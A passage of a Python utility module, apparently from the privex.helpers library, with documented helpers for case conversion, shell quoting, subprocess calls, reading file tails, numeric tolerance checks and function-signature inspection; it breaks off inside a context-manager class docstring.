        sys.exit(2)
# Matches any character followed by a capitalised word (e.g. the 'oW' boundary in 'helloWorld'),
# used by camel_to_snake to insert underscores at CamelCase word boundaries.
first_cap_re = re.compile('(.)([A-Z][a-z]+)')
# Matches a lowercase letter or digit directly followed by an uppercase letter (e.g. 'oW' in 'helloWorld'),
# catching remaining camelCase boundaries that first_cap_re missed (e.g. before all-caps runs).
all_cap_re = re.compile('([a-z0-9])([A-Z])')
def camel_to_snake(name: STRBYTES) -> str:
    """
    Convert ``name`` from camel case (``HelloWorld``) into snake case (``hello_world``).
    Accepts either :class:`str` or :class:`bytes` input.

    Example::

        >>> camel_to_snake("HelloWorldLoremIpsum")
        'hello_world_lorem_ipsum'

    :param str|bytes name: A camel case (class style) name, e.g. ``HelloWorld``
    :return str snake_case: ``name`` converted to snake case ``hello_world``
    """
    # First pass: underscore before each capitalised word; second pass: catch the remaining
    # lower/digit->upper boundaries. Finally lowercase the whole result.
    partial = first_cap_re.sub(r'\1_\2', stringify(name))
    return all_cap_re.sub(r'\1_\2', partial).lower()
def human_name(class_name: Union[str, bytes, callable, Type[object]]) -> str:
    """
    Convert a class/function name into a human readable Title Case name. Also directly accepts
    classes, class instances, and functions.

    Input names may be snake case ``my_function`` or InitialCaps ``MyClass`` - mixtures such as
    ``some_functionName`` may work, but ``some_FunctionName`` will not (causes double spaces).

    **Examples**

    Using a plain string or bytes::

        >>> human_name(b'_some_functionName')
        'Some Function Name'
        >>> human_name('SomeClassName')
        'Some Class Name'

    Using a reference to a function, class, or class instance::

        >>> def some_func():
        ...     pass
        >>> human_name(some_func)
        'Some Func'
        >>> class MyExampleClass:
        ...     pass
        >>> human_name(MyExampleClass)
        'My Example Class'
        >>> human_name(MyExampleClass())
        'My Example Class'

    :param class_name: The name of a class/function specified either in InitialCaps or snake_case.
                       You may also pass a function reference, class reference, or class instance. (see examples)
    :return str human_name: The humanised Title Case name of ``class_name``
    """
    # First we figure out what type ``class_name`` actually **is**.
    # Bytes simply get decoded back into a string, while strings are untouched
    if type(class_name) in [str, bytes]:
        class_name = stringify(class_name)
    # References to classes (not instances) and functions means we need .__name__
    elif type(class_name) is type or str(type(class_name)) == "<class 'function'>":
        class_name = class_name.__name__
    # If it's not a class/function reference, but is an instance of object, then it's a class instance.
    elif isinstance(class_name, object):
        class_name = class_name.__class__.__name__
    # Then we convert it into a normal string.
    class_name = str(class_name)
    # Strip any underscores, then dashes, at the start or end of the class name.
    name = class_name.strip('_').strip('-')
    # FIX: an empty (or separator-only) input previously raised IndexError at name[0] below.
    if not name:
        return ''
    # We can't alter an object as we iterate it, so we copy `name` into a new list which we'll modify instead
    new_name = list(name)
    # Capitalise the first letter of the name, if it isn't already.
    if name[0].islower():
        new_name[0] = name[0].upper()
    # When we inject spaces where there weren't any before, we need to track how this changes the length,
    # so that we can correctly reference positions in `new_name`
    offset = 0
    # Iterate over each character in the original name (ignoring the first letter because it's probably capital)
    for i, c in enumerate(name[1:]):
        pos = (i + 1) + offset
        # If the current character is uppercase, then inject a space before this character and increment `offset`
        if c.isupper():
            new_name = inject_items([' '], new_name, pos - 1)
            offset += 1
            continue
        # If the character is an underline or dash, replace it with a space, and uppercase the character in-front of it.
        if c in ['_', '-']:
            new_name[pos] = ' '
            # FIX: bounds check - a name ending in '_' or '-' (possible after stripping, e.g. 'ab_-' -> 'ab_')
            # previously raised IndexError via name[i + 2] here.
            if (i + 2) < len(name) and str(name[i + 2]).isalpha():
                new_name[pos + 1] = new_name[pos + 1].upper()
    return ''.join(new_name).strip()
def shell_quote(*args: str) -> str:
    """
    Accepts command line arguments as positional arguments, quotes each one so it's safe to pass
    on the command line, and returns them joined into a single string.

    Uses :func:`shlex.join` on Python 3.8+, falling back to joining :func:`shlex.quote` results
    on older versions.

    Example::

        >>> print(shell_quote('echo', '"orange"'))
        echo '"orange"'
    """
    # shlex.join only exists on Python 3.8+ - emulate it on older interpreters.
    if hasattr(shlex, 'join'):
        return shlex.join(args)
    return " ".join(shlex.quote(a) for a in args).strip()
def call_sys(proc, *args, write: STRBYTES = None, **kwargs) -> Union[Tuple[bytes, bytes], Tuple[str, str]]:
    """
    Small convenience wrapper around :class:`subprocess.Popen` - executes ``proc`` with the given
    positional arguments, optionally pipes ``write`` into its stdin, then returns the process's
    output as a ``(stdout, stderr)`` tuple.

    **Using AsyncIO?** - a native asyncio version of this function is available as :func:`.call_sys_async`,
    which uses :func:`asyncio.subprocess.create_subprocess_shell` and avoids blocking IO.

    By default ``stdout`` and ``stdin`` are :attr:`subprocess.PIPE` and ``stderr`` is
    :attr:`subprocess.STDOUT`; override them via keyword arguments. Any other unrecognised keyword
    arguments are forwarded to the :class:`subprocess.Popen` constructor.

    **NOTE:** Only the FIRST positional argument is the executable - all remaining positional arguments
    are passed to the process in order. ``write`` / ``stdout`` / ``stderr`` / ``stdin`` MUST be given
    as keyword arguments.

    **Examples**::

        >>> folders, _ = call_sys('ls', '-la', '/tmp/spaces are fine/hello world')
        >>> out, _ = call_sys('wc', '-c', write="hello world")
        >>> int(out)
        11

    :param str proc: The process to execute.
    :param str args: Any arguments to pass to the process ``proc`` as positional arguments.
    :param bytes|str write: If this is not ``None``, then this data will be piped into the process's STDIN.
    :key stdout: The subprocess file descriptor for stdout, e.g. :attr:`subprocess.PIPE` or :attr:`subprocess.STDOUT`
    :key stderr: The subprocess file descriptor for stderr, e.g. :attr:`subprocess.PIPE` or :attr:`subprocess.STDOUT`
    :key stdin: The subprocess file descriptor for stdin, e.g. :attr:`subprocess.PIPE` or :attr:`subprocess.STDIN`
    :key cwd: Set the current/working directory of the process to this path, instead of the CWD of your calling script.
    :return tuple output: A tuple containing the process output of stdout and stderr
    """
    # Pull our stream-related kwargs out before forwarding the rest to Popen.
    out_fd = kwargs.pop('stdout', PIPE)
    err_fd = kwargs.pop('stderr', STDOUT)
    in_fd = kwargs.pop('stdin', PIPE)
    command = [proc] + list(args)
    handle = subprocess.Popen(command, stdout=out_fd, stderr=err_fd, stdin=in_fd, **kwargs)
    # Only pipe data into stdin when the caller actually supplied some.
    if write is None:
        return handle.communicate()
    return handle.communicate(input=byteify(write))
def reverse_io(f: BinaryIO, blocksize: int = 4096) -> Generator[bytes, None, None]:
    """
    Read a file as a series of blocks from the END of the file towards the START.
    Bytes within each block are in normal order - only the ORDER of the blocks is reversed,
    e.g. "hello world" -> ["ld", "wor", "lo ", "hel"]

    The file handle ``f`` must be opened in binary mode.

    Original source: https://stackoverflow.com/a/136354
    """
    if 'b' not in f.mode.lower():
        raise Exception("File must be opened using binary mode.")
    total = os.stat(f.name).st_size
    nblocks, remainder = divmod(total, blocksize)
    # The short block (the file's tail) is yielded first, which leaves every remaining
    # read aligned on a blocksize boundary - likely cheaper than a short block at the start.
    f.seek(-remainder, 2)
    yield f.read(remainder)
    # Walk the full-sized blocks backwards from the end of the file to the start.
    for blk in reversed(range(nblocks)):
        f.seek(blk * blocksize)
        yield f.read(blocksize)
def io_tail(f: BinaryIO, nlines: int = 20, bsz: int = 4096) -> Generator[List[str], None, None]:
    """
    NOTE: If you're only loading a small amount of lines, e.g. less than 1MB, consider using the much easier :func:`.tail`
    function - it only requires one call and returns the lines as a singular, correctly ordered list.
    This is a generator function which works similarly to ``tail`` on UNIX systems. It efficiently retrieves lines in reverse order using
    the passed file handle ``f``.
    WARNING: This function is a generator which returns "chunks" of lines - while the lines within each chunk are in the correct order,
    the chunks themselves are backwards, i.e. each chunk retrieves lines prior to the previous chunk.
    This function was designed as a generator to allow for **memory efficient handling of large files**, and tailing large amounts of lines.
    It only loads ``bsz`` bytes from the file handle into memory with each iteration, allowing you to process each chunk of lines as
    they're read from the file, instead of having to load all ``nlines`` lines into memory at once.
    To ensure your retrieved lines are in the correct order, with each iteration you must PREPEND the outputted chunk to your final result,
    rather than APPEND. Example::
        >>> from privex.helpers import io_tail
        >>> lines = []
        >>> with open('/tmp/example', 'rb') as fp:
        ...     # We prepend each chunk from 'io_tail' to our result variable 'lines'
        ...     for chunk in io_tail(fp, nlines=10):
        ...         lines = chunk + lines
        >>> print('\\n'.join(lines))
    Modified to be more memory efficient, but originally based on this SO code snippet: https://stackoverflow.com/a/136354
    :param BinaryIO f: An open file handle for the file to tail, must be in **binary mode** (e.g. ``rb``)
    :param int nlines: Total number of lines to retrieve from the end of the file
    :param int bsz: Block size (in bytes) to load with each iteration (default: 4096 bytes). DON'T CHANGE UNLESS YOU
                    UNDERSTAND WHAT THIS MEANS.
    :return Generator chunks: Generates chunks (in reverse order) of correctly ordered lines as ``List[str]``
    """
    # 'buf' carries the (possibly partial) FIRST line of the previous block between iterations,
    # since a block boundary can fall in the middle of a line.
    buf = ''
    # Running total of lines yielded so far, so we know when 'nlines' has been satisfied.
    lines_read = 0
    # Load 4096 bytes at a time, from file handle 'f' in reverse
    for block in reverse_io(f, blocksize=int(bsz)):
        # Incase we had a partial line during our previous iteration, we append leftover bytes from
        # the previous iteration to the end of the newly loaded block
        buf = stringify(block) + buf
        lines = buf.splitlines()
        # Return all lines except the first (since may be partial)
        if lines:
            # First line may not be complete, since we're loading blocks from the bottom of the file.
            # We yield from line 2 onwards, storing line 1 back into 'buf' to be appended to the next block.
            result = lines[1:]
            res_lines = len(result)
            # If we've retrieved enough lines to meet the requested 'nlines', then we just calculate how many
            # more lines the caller wants, yield them, then return to finish execution.
            if (lines_read + res_lines) >= nlines:
                rem_lines = nlines - lines_read
                lines_read += rem_lines
                yield result[-rem_lines:]
                return
            # Yield the lines we've loaded so far
            if res_lines > 0:
                lines_read += res_lines
                yield result
            # Replace the buffer with the discarded 1st line from earlier.
            buf = lines[0]
    # If the loop is broken, it means we've probably reached the start of the file, and we're missing the first line...
    # Thus we have to yield the buffer, which should contain the first line of the file.
    yield [buf]
def tail(filename: str, nlines: int = 20, bsz: int = 4096) -> List[str]:
    """
    Pure python equivalent of the UNIX ``tail`` command - returns the last ``nlines`` lines of
    ``filename`` as a ``List[str]`` in normal (forward) order.

    This is a thin wrapper around the highly efficient generator :func:`.io_tail`, intended for a
    small (<10,000) number of lines - it must hold all ``nlines`` lines in memory to return them
    in the correct order. For very large tails, use :func:`.io_tail` directly, which only loads a
    limited number of bytes per iteration.

    Example usage::

        >>> lines = tail('/tmp/testing', nlines=3)
        >>> print("\\n".join(lines))
        this is an example 4
        this is an example 5
        this is an example 6

    :param str filename: Path to file to tail. Relative or absolute path. Absolute path is recommended for safety.
    :param int nlines: Total number of lines to retrieve from the end of the file
    :param int bsz: Block size (in bytes) to load with each iteration (default: 4096 bytes). DON'T CHANGE UNLESS YOU
                    UNDERSTAND WHAT THIS MEANS.
    :return List[str] lines: The last 'nlines' lines of the file 'filename' - in forward order.
    """
    collected: List[str] = []
    with open(filename, 'rb') as handle:
        # io_tail yields chunks in reverse order, so each chunk is PREPENDED to keep lines ordered.
        for chunk in io_tail(f=handle, nlines=nlines, bsz=bsz):
            collected = chunk + collected
    return collected
def filter_form(form: Mapping, *keys, cast: callable = None) -> Dict[str, Any]:
    """
    Extract the given ``keys`` from the dict-like ``form`` (skipping any that are missing) and
    return them as a new dictionary. If ``cast`` is given, each extracted value is passed through
    it (e.g. ``int``, ``Decimal``, ``str``).

    Example usage::

        >>> a = dict(a=1, c=2, d=3)
        >>> filter_form(a, 'a', 'c', 'e')
        {'a': 1, 'c': 2}
        >>> b = dict(lorem=1, ipsum='2', dolor=5.67)
        >>> filter_form(b, 'lorem', 'ipsum', 'dolor', cast=int)
        {'lorem': 1, 'ipsum': 2, 'dolor': 5}

    :param Mapping form: A dict-like object to extract ``key`` from.
    :param str|Any keys: One or more keys to extract from ``form``
    :param callable cast: Cast the value of any extract ``form`` key using this callable
    :return dict filtered_form: A dict containing the extracted keys and respective values from ``form``
    """
    extracted = {key: form[key] for key in keys if key in form}
    if cast is None:
        return extracted
    return {key: cast(val) for key, val in extracted.items()}
def almost(compare: NumberStr, *numbers: NumberStr, tolerance: NumberStr = Decimal('0.01'), **kwargs) -> bool:
    """
    Compare two or more numbers, returning ``True`` if all ``numbers`` are no more than ``tolerance``
    greater or smaller than ``compare`` - otherwise ``False``.
    Works similarly to :py:meth:`unittest.TestCase.assertAlmostEqual`

    Basic usage with two numbers + default tolerance (``0.01``)::

        >>> almost('5', '5.001')
        True
        >>> almost('5', '5.5')
        False

    Multiple numbers + custom tolerance::

        >>> almost('5', '5.14', '4.85', '5.08', tolerance=Decimal('0.2'))
        True
        >>> almost('5', '5.3', '4.85', '5.08', tolerance=Decimal('0.2'))
        False

    Using ``fail`` or ``test``::

        >>> # By passing ``fail=True``, a descriptive AssertionError is raised when the tolerance check fails.
        >>> almost('5', '5.01', fail=True)
        True
        >>> almost('5', '5.02', fail=True)
        Traceback (most recent call last):
          File "<stdin>", line 1, in <module>
        AssertionError: Number at position 0 (val: 5.02) failed tolerance (0.01) check against 5
        >>> # By passing ``test=True``, a standard ``assert`` will be used to compare the numbers.
        >>> almost('5', '5.01', test=True)
        True
        >>> almost('5', '5.02', test=True)
        Traceback (most recent call last):
          File "<stdin>", line 1, in <module>
        AssertionError

    :param Decimal|int|float|str compare: The base number which all ``numbers`` will be compared against.
    :param Decimal|int|float|str numbers: One or more numbers to compare against ``compare``
    :param Decimal|int|float|str tolerance: (kwarg only) Amount that each ``numbers`` can be greater/smaller than ``compare`` before
                                            returning ``False``.
    :keyword bool fail: (default: ``False``) If true, will raise :class:`.AssertionError` on failed tolerance check, instead of
                        returning ``False``. (mutually exclusive with ``test``)
    :keyword bool test: (default: ``False``) If true, will use ``assert`` instead of testing with ``if``. Useful in unit tests.
                        (mutually exclusive with ``fail``)
    :raises AttributeError: When less than 1 number is present in ``numbers``
    :raises AssertionError: When kwarg ``fail`` is ``True`` and one or more numbers failed the tolerance check.
    :return bool is_almost: ``True`` if all ``numbers`` are within ``tolerance`` of ``compare``, ``False`` if one or more ``numbers``
                            is outside of the tolerance.
    """
    if len(numbers) < 1:
        raise AttributeError(
            f'privex.helpers.common.almost expects at least ONE number to compare.'
        )
    # Normalise everything to Decimal so mixed str/int/float inputs compare exactly.
    numbers = [Decimal(n) for n in numbers]
    compare, tolerance = Decimal(compare), Decimal(tolerance)
    should_raise, should_assert = kwargs.get('fail', False), kwargs.get('test', False)
    for i, x in enumerate(numbers):
        if should_assert:
            assert (x - tolerance) <= compare <= (x + tolerance)
        elif not ((x - tolerance) <= compare <= (x + tolerance)):
            if should_raise:
                raise AssertionError(
                    f"Number at position {i} (val: {x}) failed tolerance ({tolerance}) check against {compare}"
                )
            return False
    return True
# FIX: patterns are now raw strings - '\*' inside a normal string literal is an invalid escape
# sequence (DeprecationWarning, and a SyntaxWarning on newer Python versions).
IS_XARGS = re.compile(r'^\*([a-zA-Z0-9_])+$')
"""Pre-compiled regex for matching catch-all positional argument parameter names like ``*args``"""
IS_XKWARGS = re.compile(r'^\*\*([a-zA-Z0-9_])+$')
"""Pre-compiled regex for matching catch-all keyword argument parameter names like ``**kwargs``"""
T_PARAM = inspect.Parameter
"""Type alias for :class:`inspect.Parameter`"""
T_PARAM_LIST = Union[Dict[str, T_PARAM], Mapping[str, T_PARAM], List[T_PARAM], Iterable[T_PARAM]]
"""
Type alias for dict's containing strings mapped to :class:`inspect.Parameter`'s, lists of just
:class:`inspect.Parameter`'s, and any iterable of :class:`inspect.Parameter`
"""
# noinspection PyProtectedMember,PyUnresolvedReferences
INS_EMPTY = inspect._empty
"""
Type alias for :class:`inspect.empty`
"""
def _filter_params(params: T_PARAM_LIST, ignore_xargs=False, ignore_xkwargs=False, **kwargs) -> Dict[str, T_PARAM]:
    """
    Filter an iterable containing :class:`inspect.Parameter`'s, returning a :class:`.DictObject` containing
    parameter names mapped to their :class:`inspect.Parameter` object.

    **Examples**

    Function ``some_func`` is used as an example.

        >>> import inspect
        >>> def some_func(x, y, z=123, *args, **kwargs):
        ...     pass
        >>> params = inspect.signature(some_func).parameters

    With just parameters, no filtering is done. Only scanning the parameters and returning them as a dict::

        >>> _filter_params(params)
        {'x': <Parameter "x">, 'y': <Parameter "y">, 'z': <Parameter "z=123">,
         '*args': <Parameter "*args">, '**kwargs': <Parameter "**kwargs">}

    With the arguments ``ignore_xargs=True`` and ``ignore_xkwargs=True``, this strips away any catch-all parameters
    e.g. ``*args`` / ``**kwargs``. Example::

        >>> _filter_params(params, ignore_xargs=True, ignore_xkwargs=True)
        {'x': <Parameter "x">, 'y': <Parameter "y">, 'z': <Parameter "z=123">}

    With the arguments ``ignore_defaults=True`` and ``ignore_positional=True``, this strips away all normal positional
    and keyword parameters - leaving only catch-all parameters for positional/keyword arguments. Example::

        >>> _filter_params(params, ignore_defaults=True, ignore_positional=True)
        {'*args': <Parameter "*args">, '**kwargs': <Parameter "**kwargs">}

    :param params: An iterable of :class:`inspect.Parameter`'s, e.g. from ``inspect.signature(func).parameters``
    :param bool ignore_xargs: Filter out any catch-all positional arguments (e.g. ``*args``)
    :param bool ignore_xkwargs: Filter out any catch-all keyword arguments (e.g. ``**kwargs``)
    :key bool ignore_defaults: Filter out any parameter which has a default value (e.g. args usable as kwargs)
    :key bool ignore_positional: Filter out any parameter which doesn't have a default value (mandatory args)
    :return DictObject filtered: A dictionary of filtered params, mapping param names to Parameter objects.
    """
    ignore_defaults = kwargs.pop('ignore_defaults', False)
    ignore_positional = kwargs.pop('ignore_positional', False)
    # Accept either a mapping of name -> Parameter (e.g. ``Signature.parameters``) or a plain
    # iterable of Parameter objects. The old ``isinstance(params, (dict, OrderedDict))`` test
    # was redundant - OrderedDict is a dict subclass and both expose ``.values()``.
    _params = params.values() if hasattr(params, 'values') else params

    # Classification predicates as plain functions instead of name-assigned lambdas (PEP 8 / E731).
    def _is_xargs(param) -> bool:
        # True for catch-all positional params, e.g. '*args'
        return IS_XARGS.search(str(param)) is not None

    def _is_xkwargs(param) -> bool:
        # True for catch-all keyword params, e.g. '**kwargs'
        return IS_XKWARGS.search(str(param)) is not None

    def _is_x_arg(param) -> bool:
        # True for either kind of catch-all param
        return _is_xargs(param) or _is_xkwargs(param)

    def _def_empty(param) -> bool:
        # True when the param has no (usable) default value, i.e. it's a mandatory argument
        return empty(param.default) or param.default is INS_EMPTY

    filtered = DictObject()
    for p in _params:  # type: inspect.Parameter
        if ignore_xargs and _is_xargs(p): continue
        if ignore_xkwargs and _is_xkwargs(p): continue
        # x-args (*args / **kwargs) cannot count as defaults / positionals and shouldn't be counted in this IGNORE.
        if ignore_defaults and not _def_empty(p) and not _is_x_arg(p): continue
        if ignore_positional and _def_empty(p) and not _is_x_arg(p): continue
        # Keys use the raw signature form (e.g. '*args'), unless str(p) contains '=' (param
        # with a default) - then the bare parameter name is used instead.
        param_name = str(p) if '=' not in str(p) else p.name
        filtered[param_name] = p
    return filtered
T_PARAM_DICT = Union[
Dict[str, T_PARAM],
DictObject,
Dict[type, Dict[str, T_PARAM]]
]
"""
Type alias for dict's mapping parameter names to :class:`inspect.Parameter`'s, :class:`.DictObject`'s,
and dict's mapping classes to dict's mapping parameter names to :class:`inspect.Parameter`'s.
"""
def get_function_params(obj: Union[type, callable], check_parents=False, **kwargs) -> T_PARAM_DICT:
    """
    Extracts a function/method's signature (or class constructor signature if a class is passed), and returns
    it as a dictionary.

    Primarily used by :func:`.construct_dict` - but may be useful for other purposes.

    If you've passed a class, you can set ``check_parents`` to ``True`` to obtain the signatures of the passed
    class's constructor AND all of it's parent classes, returned as a dictionary mapping classes to dictionaries
    of parameters.

    If you've set ``check_parents`` to ``True``, but you want the parameters to be a flat dictionary (just like when
    passing a function or class without check_parents), you can also pass ``merge=True``, which merges each class's
    constructor parameters into a dictionary mapping names to :class:`inspect.Parameter` objects.

    If any parameters conflict, children's constructor parameters always take precedence over their parent's version,
    much in the same way that Python's inheritance works.

    **Basic (with functions)**::

        >>> def some_func(x, y, z=123, *args, **kwargs):
        ...     pass

    Get all normal parameters (positional and kwargs - excluding catch-all ``*args`` / ``**kwargs`` parameter types)::

        >>> params = get_function_params(some_func)
        >>> params
        {'x': <Parameter "x">, 'y': <Parameter "y">, 'z': <Parameter "z=123">}

    Get raw parameter name and value (as written in signature) / access default values::

        >>> str(params.z.name)   # You can also access it via params['z']
        'z=123'
        >>> params.z.default     # You can also access it via params['z']
        123

    Get only **required** parameters::

        >>> get_function_params(some_func, ignore_defaults=True)
        {'x': <Parameter "x">, 'y': <Parameter "y">}

    Get only parameters with defaults::

        >>> get_function_params(some_func, ignore_positional=True)
        {'z': <Parameter "z=123">}

    **Example Usage (with classes and sub-classes)**::

        >>> class BaseClass:
        ...     def __init__(self, a, b, c=1234, **kwargs):
        ...         pass
        >>> class Example(BaseClass):
        ...     def __init__(self, d, e='hello', f=None, a='overridden', **kwargs):
        ...         super().__init__(a=a, d=d, e=e, f=f, **kwargs)

    If we pass the class ``Example`` on it's own, we get a dictionary of just it's own parameters::

        >>> get_function_params(Example)
        {'d': <Parameter "d">, 'e': <Parameter "e='hello'">, 'f': <Parameter "f=None">}

    However, if we set ``check_parents=True``, we now get a dictionary containing ``Example``'s constructor parameters,
    AND ``BaseClass``'s (it's parent class) constructor parameters, organised by class::

        >>> get_function_params(Example, True)
        {
            <class '__main__.Example'>: {
                'd': <Parameter "d">, 'e': <Parameter "e='hello'">, 'f': <Parameter "f=None">,
                'a': <Parameter "a='overridden'">
            },
            <class '__main__.BaseClass'>: {'a': <Parameter "a">, 'b': <Parameter "b">, 'c': <Parameter "c=1234">}
        }

    We can also add the optional kwarg ``merge=True``, which merges the parameters of the originally passed class,
    and it's parents.

    This is done in reverse order, so that children's conflicting constructor parameters take priority over their
    parents, as can be seen below with ``a`` which is shown as ``a='overridden'`` - the overridden parameter
    of the class ``Example`` with a default value, instead of the parent's ``a`` which makes ``a`` mandatory::

        >>> get_function_params(Example, True, merge=True)
        {
            'a': <Parameter "a='overridden'">, 'b': <Parameter "b">, 'c': <Parameter "c=1234">,
            'd': <Parameter "d">, 'e': <Parameter "e='hello'">, 'f': <Parameter "f=None">
        }

    :param type|callable obj: A class (not an instance) or callable (function / lambda) to extract and filter the
                              parameter's from. If a class is passed, the parameters of the constructor will be
                              returned (``__init__``), excluding the initial ``self`` parameter.
    :param bool check_parents: (Default: ``False``) If ``obj`` is a class and this is True, will recursively grab
        the constructor parameters for all parent classes, and return the parameters as a dictionary of
        ``{<class X>: {'a': <Parameter 'a'>}, <class Y>: {'b': <Parameter 'b'>}``, unless ``merge`` is also set
        to ``True``.
    :key bool ignore_xargs: (Default: ``True``) Filter out any catch-all positional arguments (e.g. ``*args``)
    :key bool ignore_xkwargs: (Default: ``True``) Filter out any catch-all keyword arguments (e.g. ``**kwargs``)
    :key bool ignore_defaults: (Default: ``False``) Filter out any parameter which has a default
        value (e.g. args usable as kwargs)
    :key bool ignore_positional: (Default: ``False``) Filter out any parameter which doesn't have a default
        value (mandatory args)
    :key bool merge: (Default: ``False``) If this is True, when ``check_parents`` is enabled, all parameters will
        be flatted into a singular dictionary, e.g. ``{'a': <Parameter 'a'>, 'b': <Parameter "b">}``
    :return:
    """
    merge = kwargs.pop('merge', False)
    filter_opts = dict(**kwargs)
    # Unlike _filter_params, catch-all parameters (*args / **kwargs) are excluded by default here.
    filter_opts['ignore_xargs'] = filter_opts.get('ignore_xargs', True)
    filter_opts['ignore_xkwargs'] = filter_opts.get('ignore_xkwargs', True)
    # BUGFIX: the signature was previously extracted twice - once into an unused '_cls_keys'
    # variable, and again for the _filter_params() call. Compute it just once.
    cls_keys = _filter_params(inspect.signature(obj).parameters, **filter_opts)
    if check_parents and hasattr(obj, '__base__') and inspect.isclass(obj):
        # Map each class in the inheritance chain to its own filtered constructor params,
        # starting with the passed class itself.
        ret = OrderedDictObject({obj: cls_keys})
        last_parent = obj.__base__
        while last_parent not in [None, type, object]:
            try:
                ret[last_parent] = _filter_params(
                    inspect.signature(last_parent).parameters, **filter_opts
                )
                if not hasattr(last_parent, '__base__'):
                    last_parent = None
                    continue
                last_parent = last_parent.__base__
            except (Exception, BaseException) as e:
                # Deliberate best-effort: some parents may not have an inspectable
                # signature - log and stop walking instead of propagating the error.
                log.warning("Finishing check_parents loop due to exception: %s - %s", type(e), str(e))
                last_parent = None
                continue
        if merge:
            # Merge in reverse order (parents first), so children's conflicting
            # parameters overwrite their parents' versions.
            merged = OrderedDictObject()
            for cls in reversed(ret):
                for k, p in ret[cls].items():
                    merged[k] = p
            return merged
        return ret
    return OrderedDictObject(cls_keys)
def construct_dict(cls: Union[Type[T], C], kwargs: dict, args: Iterable = None, check_parents=True) -> Union[T, Any]:
    """
    Removes keys from the passed dict ``data`` which don't exist on ``cls`` (thus would get rejected as kwargs)
    using :func:`.get_function_params`. Then create and return an instance of ``cls``, passing the filtered
    ``kwargs`` dictionary as keyword args.

    Ensures that any keys in your dictionary which don't exist on ``cls`` are automatically filtered out, instead
    of causing an error due to unexpected keyword arguments.

    **Example - User class which only takes specific arguments**

    First let's define a class which only takes three arguments in it's constructor - username, first_name, last_name.

        >>> class User:
        ...     def __init__(self, username, first_name=None, last_name=None):
        ...         self.username = username
        ...         self.first_name, self.last_name = first_name, last_name
        ...

    Now we'll create a dictionary which has those three arguments, but also the excess ``address`` and ``phone``.

        >>> data = dict(username='johndoe123', first_name='John', last_name='Doe',
        ...             address='123 Example St', phone='+1-123-000-1234')

    If we tried to directly pass data as keyword args, we'd get an error::

        >>> john = User(**data)
        TypeError: __init__() got an unexpected keyword argument 'address'

    But by using :func:`.construct_dict`, we're able to construct a ``User``, as this helper function detects that
    the excess ``address`` and ``phone`` are not valid parameters for ``User``'s constructor.

        >>> from privex.helpers import construct_dict
        >>> john = construct_dict(User, data)
        >>> print(john.username, john.first_name, john.last_name)
        johndoe123 John Doe

    **Example - A function/method which only takes specific arguments**

    Not only can :func:`.construct_dict` be used for classes, but it can also be used for any function/method.

    Here's an example using a simple "factory function" which creates user objects::

        >>> def create_user(username, first_name=None, last_name=None):
        ...     return User(username, first_name, last_name)
        >>>
        >>> data = dict(
        ...     username='johndoe123', first_name='John', last_name='Doe',
        ...     address='123 Example St', phone='+1-123-000-1234'
        ... )
        >>> # We can't just pass data as kwargs due to the extra keys.
        >>> create_user(**data)
        TypeError: create_user() got an unexpected keyword argument 'address'
        >>> # But we can call the function using construct_dict, which filters out the excess dict keys :)
        >>> john = construct_dict(create_user, data)
        >>> print(john.username, john.first_name, john.last_name)
        johndoe123 John Doe

    :param Type[T]|callable cls: A class (not an instance) or callable (function / lambda) to extract and filter the
                                 parameter's from, then call using filtered ``kwargs`` and ``args``.
    :param dict kwargs: A dictionary containing keyword arguments to filter and use to call / construct ``cls``.
    :param list|set args: A list of positional arguments (NOT FILTERED!) to pass when calling/constructing ``cls``.
    :param bool check_parents: (Default: ``True``) If ``obj`` is a class and this is True, will recursively grab
                               the constructor parameters for all parent classes of ``cls`` and merge them into the
                               returned dict.
    :return Any func_result: If ``cls`` was a function/method, the return result will be the returned data/object
                             from the function passed.
    :return T cls_instance: If ``cls`` was a class, then the return result will be an instance of the class.
    """
    args = empty_if(args, [])
    if hasattr(cls, '__attrs_attrs__'):
        # If the passed object has the attribute __attrs_attrs__, then this means that it's an ``attr.s`` class, so
        # we should just extract the attributes from __attrs_attrs__.
        cls_keys = {atr.name for atr in cls.__attrs_attrs__}
    else:
        # Otherwise, extract the function / class's expected parameter names using our helper get_function_params().
        cls_keys = set(get_function_params(cls, check_parents=check_parents, merge=True).keys())
    # cls_keys is a set in both branches, so each membership test below is O(1) instead of
    # scanning a list of attribute names per kwarg.
    clean_data = {x: y for x, y in kwargs.items() if x in cls_keys}
    return cls(*args, **clean_data)
class LayeredContext:
    """
    A wrapper class for context manager classes / functions which allows you to control how many ``with`` layers that a context manager
    can have - and allow for the previous layer's context manager ``__enter__`` / ``yield`` result to be passed down
    when :attr:`.max_layers` is hit.

    (context managers are classes/functions with the methods ``__enter__`` / ``__exit__`` / ``__aenter__`` / ``__aexit__`` etc.)

    Works with context manager classes, asyncio context manager classes, and :func:`contextlib.contextmanager` functions.

    By default, :class:`.LayeredContext` sets :attr:`.max_layers` to ``1``, meaning after 1 layer of ``with`` or ``async with``
    statements, all additional layers will simply get given the same context result as the 1st layer, plus both ``__enter__``
    and ``__exit__`` will only be called once (at the start and end of the first layer).

    **Using with class-based context managers**::

        >>> class Hello:
        ...     def __enter__(self):
        ...         print('entering Hello')
        ...         return self
        ...     def __exit__(self, exc_type, exc_val, exc_tb):
        ...         print('exiting Hello')
        >>> ctx_a = LayeredContext(Hello())
        >>> with ctx_a as a:
        ...     print('class manager layer 1')
        ...     with ctx_a as b:
        ...         print('class manager layer 2')
        ...     print('back to class layer 1')
        entering Hello
        class manager layer 1
        class manager layer 2
        back to class layer 1
        exiting Hello

    We can see that ``entering Hello`` and ``exiting Hello`` were only outputted at the end of the first context block ``with ctx_a as a``,
    showing that ``Hello`` was only entered/exited as a context manager for the first ``with`` block.

    **Using with function-based :func:`contextlib.contextmanager` context managers**::

        >>> from contextlib import contextmanager
        >>> @contextmanager
        >>> def lorem():
        ...     print('entering lorem contextmanager')
        ...     yield 'hello world'
        ...     print('exiting lorem contextmanager')
        >>> ctx_b = LayeredContext(lorem())
        >>> with ctx_b as c:
        ...     print('function manager layer 1 - context is:', c)
        ...     with ctx_b as d:
        ...         print('function manager layer 2 - context is:', d)
        ...     print('back to function layer 1')
        entering lorem contextmanager
        function manager layer 1 - context is: hello world
        function manager layer 2 - context is: hello world
        back to function layer 1
        exiting lorem contextmanager

    We can see the default :attr:`.max_layers` of ``1`` was respected, as the 2nd layer ``with ctx_b as d`` only
    printed ``function manager layer 2`` (thus ``lorem``'s enter/exit methods were not called), and it shows the
    context is still ``hello world`` (the context yielded by ``lorem`` in layer 1).

    **Example usage**

    First we need an example class which can be used as a context manager, so we create ``Example`` with a very simple
